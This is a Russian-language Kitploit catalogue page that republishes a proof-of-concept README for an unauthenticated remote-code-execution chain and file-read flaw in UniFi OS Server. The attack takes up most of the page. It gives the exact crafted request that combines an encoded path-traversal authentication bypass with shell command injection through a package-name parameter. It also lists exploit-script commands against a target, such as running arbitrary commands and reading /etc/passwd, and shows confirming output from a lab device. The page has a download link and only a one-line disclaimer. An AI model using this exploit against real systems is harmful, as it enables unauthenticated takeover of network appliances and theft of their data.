Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-34910-PoC — CVE-2026-34910/34909 — неавторизованное RCE в UniFi OS + чтение файлов через обход аутентификации ..%2f (CVSS 10.0, KEV, Mirai ITW) | Kitploit
Инструменты/GitHubGitHub/boreas37/cve-2026-34910-poc
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование безопасности APIТестирование на ПроникновениеАутентификация
GitHubboreas37/cve-2026-34910-poc

CVE-2026-34910-PoC

CVE-2026-34910/34909 — неавторизованное RCE в UniFi OS + чтение файлов через обход аутентификации ..%2f (CVSS 10.0, KEV, Mirai ITW)

Репозиторий
610 дней назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-34910 / CVE-2026-34909 — Неаутентифицированное RCE и чтение файлов в UniFi OS

Неаутентифицированное RCE через инъекцию команд (CVE-2026-34910) + произвольное чтение файлов через обход пути (CVE-2026-34909) в UniFi OS Server. CVSS 10.0 (Critical) у каждой · внесено в перечень CISA KEV · активно эксплуатируется ботнетом на базе Mirai (имплант azsxd).

TL;DR

Ubiquiti UniFi OS включает nginx-шлюз аутентификации, который считает публичным любой запрос, чей RAW URI начинается с /api/auth/validate-sso/, но маршрутизирует по NORMALIZED URI (декодирует %2f → / и схлопывает ../). Кодирование обхода заставляет эти два URI расходиться:

root@kitploit:~
GET /api/auth/validate-sso/..%2f..%2f..%2fproxy/users/api/v2/ucs/update/latest_package?pkg_name=<CMD>&by_cmd=true

→ попадает во внутренний обработчик обновления пакетов, который передаёт pkg_name в /bin/sh -c → неаутентифицированное RCE одним запросом.

Тот же примитив против /app-assets/... читает файлы с диска (CVE-2026-34909).

Эксплуатация

root@kitploit:~
# 1. Auth-bypass probe (non-destructive)
python3 CVE-2026-34910.py https://TARGET:8443 --check

# 2. RCE — run a command (CVE-2026-34910)
python3 CVE-2026-34910.py https://TARGET:8443 "id > /tmp/pwned.txt"

# 3. RCE proof — create a file on the target
python3 CVE-2026-34910.py https://TARGET:8443 --proof

# 4. File read (CVE-2026-34909)
python3 CVE-2026-34910.py https://TARGET:8443 --read /etc/passwd

RCE-пейлоад внедряет точку с запятой во внутреннюю shell-команду обработчика sudo systemctl stop <pkg_name>: pkg_name=evil;<CMD> → sudo systemctl stop evil;<CMD> — внедрённая команда выполняется на хосте от имени пользователя ucs-update.

Проверено на реальном UniFi OS Server 5.0.6 (с завершённой настройкой)

root@kitploit:~
$ python3 CVE-2026-34910.py https://127.0.0.1:11443 --proof
[*] Komut: touch /tmp/PWNED_34910
[*] HTTP 200
[*] Yanıt: {"code":-3,"codeS":"CODE_SYSTEM_ERROR",...}
[+] İstek gönderildi — komut hedefte çalıştırıldı

# On the target (docker exec unifi-os-vuln):
$ ls -la /tmp/PWNED_34910
-rw-r--r-- 1 ucs-update ucs-update 0 Aug  9 21:52 /tmp/PWNED_34910   ✅ FILE CREATED

Верификация (реальный UniFi OS)

✅ ПОЛНОСТЬЮ ПОДТВЕРЖДЕНО — RCE подтверждено на реальном UniFi OS Server 5.0.6 (уязвимая версия, настройка завершена), работающем в Docker (hieutq/unifi-os-server:5.0.6-amd64):

  1. Обход аутентификации через ..%2f достигает внутреннего обработчика latest_package (ответ: CODE_SYSTEM_ERROR / "pkg_name required" — а не nginx 400).
  2. pkg_name=evil;touch /tmp/PWNED_34910&by_cmd=true создал файл на целевом устройстве (-rw-r--r-- ucs-update) → инъекция команд → RCE подтверждено.
  3. Против исправленного UniFi OS 5.1.21 тот же запрос возвращает HTTP 400 (nginx отклоняет расхождение raw-URI/normalized-URI), подтверждая чистый отрицательный результат.

Настройка выполнялась через реальный веб-мастер (имя устройства → учётные данные → пароль консоли → завершение), поэтому лабораторная среда соответствует устройству, развёрнутому в production.

root@kitploit:~
$ python3 CVE-2026-34910.py http://127.0.0.1:8443 --check
[*] Auth-bypass probe: HTTP 200
[+] SAVUNMASIZ — handler'a ulaşıldı (pkg_name required)

$ python3 CVE-2026-34910.py http://127.0.0.1:8443 --read /etc/passwd
[*] Dosya: /etc/passwd
[*] HTTP 200
[+] Dosya içeriği (80 byte):
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin

Затронутые / Исправленные

В дикой природе

Ботнет на базе Mirai/Gafgyt (имплант azsxd v2.0) комбинирует обход аутентификации + инъекцию команд для неаутентифицированного RCE — мультиархитектурный загрузчик, распространяемый с 185.228.26.16. См. разбор pwndefend.

Ссылки

  • Ubiquiti SAB-064
  • NVD — CVE-2026-34910
  • NVD — CVE-2026-34909
  • CISA KEV
  • Детектор BishopFox для CVE-2026-34908

Отказ от ответственности

Только для авторизованного тестирования безопасности и образовательных целей.

Скачать инструмент
CVEКритичностьЗатронутыеИсправленные
CVE-2026-3491010.0 CriticalUniFi OS Server (до SAB-064)SAB-064
CVE-2026-3490910.0 CriticalUniFi OS Server (до SAB-064)SAB-064
CVE-2026-3490810.0 CriticalUniFi OS Server (до SAB-064)SAB-064